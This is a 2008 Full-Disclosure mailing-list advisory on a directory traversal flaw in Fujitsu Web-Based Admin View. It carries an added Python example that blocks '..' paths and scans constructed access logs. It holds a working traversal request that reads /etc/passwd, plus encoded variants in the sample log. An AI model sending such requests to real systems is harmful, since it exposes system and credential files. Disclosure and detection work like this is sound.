
[Full-disclosure] Fujitsu Web-Based Admin View Directory Traversal Vulnerability

From: Deniz Cevik <Deniz.Cevik_at_nospam>
Date: Thu Aug 21 2008 - 13:34:00 GMT
To: <full-disclosure@lists.grok.org.uk>


Fujitsu Web-Based Admin View Directory Traversal Vulnerability  

Version: 2.1.2 on Solaris; other versions may be vulnerable

Vulnerability: Directory Traversal  

Risk: Critical  

Description: Due to insufficient validation of user input, Fujitsu Web-Based Admin View reveals the contents of files residing in directories outside the web root. This allows an attacker to read arbitrary local files in the context of the web server.

Sample Request:  

GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0
Host: target:8081
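The fix for this class of bug is to refuse any parent-directory step after percent-decoding and to confirm the resolved file stays under the web root; the same filter can be run over access logs to spot requests like the one above. The following is an added example written for this post, not code from Fujitsu or the product; the web root path and the log lines are constructed.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical document root; the advisory does not name the product's real web root.
WEBROOT = "/opt/webadmin/htdocs"

def canonical_segments(url_path):
    """Split a request path into segments after full percent-decoding.
    Returns None when the path carries a NUL byte or any '..' segment."""
    path = url_path.split("?", 1)[0]
    # Decode until stable so double-encoded forms such as %252e%252e are caught too.
    while (decoded := unquote(path)) != path:
        path = decoded
    if "\x00" in path:
        return None
    segments = [s for s in path.split("/") if s not in ("", ".")]
    return None if ".." in segments else segments

def resolve_request_path(url_path, webroot=WEBROOT):
    """Map a URL path onto the filesystem; None means the request must be rejected."""
    segments = canonical_segments(url_path)
    if segments is None:
        return None
    full = posixpath.normpath(posixpath.join(webroot, *segments))
    # Containment check as an independent second line of defence.
    if full != webroot and not full.startswith(webroot + "/"):
        return None
    return full

# Constructed access-log lines in Common Log Format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [21/Aug/2008:13:34:00 +0000] "GET /index.html HTTP/1.0" 200 512
10.0.0.9 - - [21/Aug/2008:13:35:10 +0000] "GET /.././.././.././etc/passwd HTTP/1.0" 200 1023
10.0.0.9 - - [21/Aug/2008:13:35:12 +0000] "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.0" 200 1023
10.0.0.7 - - [21/Aug/2008:13:36:00 +0000] "GET /css/./style.css HTTP/1.0" 200 88
"""

def traversal_attempts(log_text):
    """Return the request paths of log lines whose path fails the traversal filter."""
    hits = []
    for line in log_text.splitlines():
        try:
            path = line.split('"', 2)[1].split(" ")[1]
        except IndexError:
            continue
        if canonical_segments(path) is None:
            hits.append(path)
    return hits
```

A 200 status on a request that fails the filter is the signal to look for in historical logs; a patched server should answer such requests with an error instead.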

Deniz CEVIK

www.intellectpro.com.tr  



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/